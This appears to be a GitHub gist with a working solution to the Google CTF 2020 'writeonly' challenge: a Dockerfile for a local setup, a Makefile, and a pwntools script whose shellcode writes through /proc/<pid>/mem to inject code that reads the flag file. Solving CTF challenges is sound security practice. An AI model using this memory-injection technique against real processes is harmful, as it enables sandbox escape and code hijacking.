Skip to content

Instantly share code, notes, and snippets.

@kitsook
Created December 13, 2020 07:16
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save kitsook/797ebdce57cb4a5eb6f98bfeb949a150 to your computer and use it in GitHub Desktop.
Save kitsook/797ebdce57cb4a5eb6f98bfeb949a150 to your computer and use it in GitHub Desktop.
Alt attempt on Google CTF 2020 writeonly
FROM ubuntu:20.04
RUN apt-get update && apt-get upgrade -y && apt-get install -y socat
RUN set -e -x; \
groupadd -g 1337 user; \
useradd -g 1337 -u 1337 -m user
COPY attachments/chal /home/user/
COPY flag /home/user/
RUN set -e -x; \
chown -R root:root /home/user; \
chmod 555 /home/user; \
chmod 555 /home/user/chal; \
chmod 444 /home/user/flag
USER user
CMD cd /home/user && socat TCP-LISTEN:1337,reuseaddr,fork EXEC:./chal
from pwn import remote
import pwnlib
import os
# automatically set the binary type
pwnlib.context.context.binary = 'src/chal'
# connect to the site and get child pid
r = remote('127.0.0.1', 1337)
r.recvuntil('[DEBUG] child pid: ')
child_pid = int(r.recvline())
# this is the code to be injected into child. since the child can read files, cat the flag
injection = pwnlib.asm.asm(pwnlib.shellcraft.cat('/home/user/flag', 1) + pwnlib.shellcraft.crash())
# assemble the code to be executed by parent.
# open child's memory for writing
payload = pwnlib.shellcraft.open("/proc/{}/mem".format(child_pid), os.O_WRONLY)
# get the file descriptor and seek.
# looking at the disassembled check_flag function, the infinite loop starts at <check_flag+0x8>
payload += pwnlib.shellcraft.mov('r12', 'rax')
payload += pwnlib.shellcraft.syscall('SYS_lseek', 'r12', pwnlib.context.context.binary.symbols['check_flag'] + 0x8, os.SEEK_SET)
# parent write to child's memory and inject our code
payload += pwnlib.shellcraft.pushstr(injection)
payload += pwnlib.shellcraft.write("r12", "rsp", len(injection))
payload = pwnlib.asm.asm(payload + pwnlib.shellcraft.infloop())
r.sendlineafter('shellcode length? ', str(len(payload)))
r.sendafter('bytes of shellcode. ', payload)
# print the output from child
while True:
print(r.recvline())
doit:
python doit.py
build:
docker build -t sandbox-writeonly .
start:
docker run --rm --name sandbox-writeonly -p 127.0.0.1:1337:1337 sandbox-writeonly
stop:
docker stop sandbox-writeonly
disass:
objdump --disassemble=check_flag src/chal
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment